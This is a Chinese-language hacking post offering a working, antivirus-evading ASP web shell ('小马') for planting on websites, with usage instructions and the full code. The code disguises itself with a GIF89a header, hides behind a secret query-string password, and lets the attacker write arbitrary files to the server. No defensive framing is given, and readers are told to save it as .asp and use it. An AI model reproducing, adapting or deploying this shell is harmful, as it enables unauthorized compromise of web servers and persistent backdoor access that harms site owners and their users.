献给还在为寻找免杀小马而烦恼的朋友们。
永久免杀是不可能的,至少现在是免杀的。(全球免杀哈)
估计N年后也是免杀的。要是它都被杀掉了,估计很多网站源码都要被列入被杀对象。
特点:短小精悍,免杀,安全(可自行设置密钥)。
其实这篇已经写完了,图片都传好了。就差最后一个发布按钮没点了。结果突然断电了。差点没把旁边的手机扔出去。
接着传图片,以便直观。字我就少打点,看图都应该明白怎么用。
第一款小马使用方法
例如,小马地址:
http://www.0daynet.com/1.asp 
那么后门地址就是:
http://www.0daynet.com/1.asp?0daynet=0day 
后门地址可自己设置,防止shell被别人发现盗用。避免设置普通密码,被"有心人"社工了。
小马代码如下:
GIF89a$ ;<hTml>
<% if request("0daynet")="0day" then %>
<%
on error resume next
testfile=Request.form("2010")
if Trim(request("2010"))<>"" then
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.CreateTextFile(testfile,True)
thisfile.Write(""&Request.form("1988") & "")
if err =0 Then
response.write"<font color=red>Success</font>"
else
response.write"<font color=red>False</font>"
end if
err.clear
thisfile.close
set fs = nothing
End if
%>
<form method="POST" ACTION="">
<input type="text" size="54" name="2010"
value="<%=server.mappath("akt.asp")%>"> <BR>
<TEXTAREA NAME="1988" ROWS="18" COLS="78"></TEXTAREA>
<input type="submit" name="Send" value="GO!">
</form>
<% end if %>
</hTml>
复制保存为asp格式就行了
